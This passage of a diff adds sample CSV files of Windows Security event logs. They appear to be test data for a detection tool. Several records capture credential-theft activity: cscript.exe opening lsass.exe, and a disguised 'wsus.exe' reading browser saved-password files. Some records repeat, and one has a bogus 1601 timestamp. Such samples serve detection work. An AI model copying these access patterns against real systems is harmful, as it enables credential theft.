+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x21aad4a</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">860D1189-6C67-C57B-59ED-C0676A052019</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">62862</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-02T15:47:57.252932+04:00,1599047277.252932,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-02T11:47:49.966623Z"">
+    </TimeCreated>
+    <EventRecordID>2171294</EventRecordID>
+    <Correlation ActivityID=""4F7FBBE3-7BB5-0002-EBBB-7F4FB57BD601"">
+    </Correlation>
+    <Execution ProcessID=""632"" ThreadID=""4244"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x21aa47f</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">27FCE179-F80F-F6A6-7DF4-C247E783B072</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">62860</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-02T15:47:48.959767+04:00,1599047268.959767,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-02T11:47:48.842119Z"">
+    </TimeCreated>
+    <EventRecordID>2171292</EventRecordID>
+    <Correlation ActivityID=""4F7FBBE3-7BB5-0002-EBBB-7F4FB57BD601"">
+    </Correlation>
+    <Execution ProcessID=""632"" ThreadID=""4244"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-1106</Data>
+    <Data Name=""TargetUserName"">a-jbrown</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x21a8c9a</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">467413FE-B054-D9AE-C758-B41105A3ECA9</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.142</Data>
+    <Data Name=""IpPort"">60726</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-02T15:47:48.842119+04:00,1599047268.842119,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-02T11:47:48.823276Z"">
+    </TimeCreated>
+    <EventRecordID>2171291</EventRecordID>
+    <Correlation ActivityID=""4F7FBBE3-7BB5-0002-EBBB-7F4FB57BD601"">
+    </Correlation>
+    <Execution ProcessID=""632"" ThreadID=""4244"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-1106</Data>
+    <Data Name=""TargetUserName"">a-jbrown</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x21a8c80</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">467413FE-B054-D9AE-C758-B41105A3ECA9</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.142</Data>
+    <Data Name=""IpPort"">60728</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-02T15:47:48.823276+04:00,1599047268.823276,4624,a-jbrown,3B,3,NtLmSsp,172.16.66.142,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-02T11:47:48.570502Z"">
+    </TimeCreated>
+    <EventRecordID>2171290</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""632"" ThreadID=""4244"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-1106</Data>
+    <Data Name=""TargetUserName"">a-jbrown</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x21a8c68</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">04246W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.142</Data>
+    <Data Name=""IpPort"">60726</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
diff --git a/source/samples/Sample_Object_Access_Events.csv b/source/samples/Sample_Object_Access_Events.csv
new file mode 100644
index 0000000..01dbd53
--- /dev/null
+++ b/source/samples/Sample_Object_Access_Events.csv
@@ -0,0 +1,14715 @@
+Date and Time,timestamp,Event ID,Account Name,Object Name,Object Type,Process Name,Computer Name,Channel,Original Event Log
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12802</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-08T22:11:34.340584Z"">
+    </TimeCreated>
+    <EventRecordID>314462</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""160"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x33392</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Process</Data>
+    <Data Name=""ObjectName"">\Device\HarddiskVolume1\Windows\System32\lsass.exe</Data>
+    <Data Name=""HandleId"">0x558</Data>
+    <Data Name=""AccessList"">%%4484 
+				</Data>
+    <Data Name=""AccessMask"">0x10</Data>
+    <Data Name=""ProcessId"">0x1688</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""ResourceAttributes"">-</Data>
+  </EventData>
+</Event>"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12802</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-08T22:11:34.340584Z"">
+    </TimeCreated>
+    <EventRecordID>314462</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""160"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x33392</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Process</Data>
+    <Data Name=""ObjectName"">\Device\HarddiskVolume1\Windows\System32\lsass.exe</Data>
+    <Data Name=""HandleId"">0x558</Data>
+    <Data Name=""AccessList"">%%4484 
+				</Data>
+    <Data Name=""AccessMask"">0x10</Data>
+    <Data Name=""ProcessId"">0x1688</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""ResourceAttributes"">-</Data>
+  </EventData>
+</Event>"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12802</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-08T22:11:34.340584Z"">
+    </TimeCreated>
+    <EventRecordID>314462</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""160"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x33392</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Process</Data>
+    <Data Name=""ObjectName"">\Device\HarddiskVolume1\Windows\System32\lsass.exe</Data>
+    <Data Name=""HandleId"">0x558</Data>
+    <Data Name=""AccessList"">%%4484 
+				</Data>
+    <Data Name=""AccessMask"">0x10</Data>
+    <Data Name=""ProcessId"">0x1688</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""ResourceAttributes"">-</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:50.134293Z"">
+    </TimeCreated>
+    <EventRecordID>4991</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""44"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:18.699755Z"">
+    </TimeCreated>
+    <EventRecordID>4990</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:05.308188Z"">
+    </TimeCreated>
+    <EventRecordID>4989</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:31:15.355063Z"">
+    </TimeCreated>
+    <EventRecordID>4988</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""68"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12802</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-08T22:11:34.340584Z"">
+    </TimeCreated>
+    <EventRecordID>314462</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""160"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x33392</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Process</Data>
+    <Data Name=""ObjectName"">\Device\HarddiskVolume1\Windows\System32\lsass.exe</Data>
+    <Data Name=""HandleId"">0x558</Data>
+    <Data Name=""AccessList"">%%4484 
+				</Data>
+    <Data Name=""AccessMask"">0x10</Data>
+    <Data Name=""ProcessId"">0x1688</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""ResourceAttributes"">-</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:50.134293Z"">
+    </TimeCreated>
+    <EventRecordID>4991</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""44"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:18.699755Z"">
+    </TimeCreated>
+    <EventRecordID>4990</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
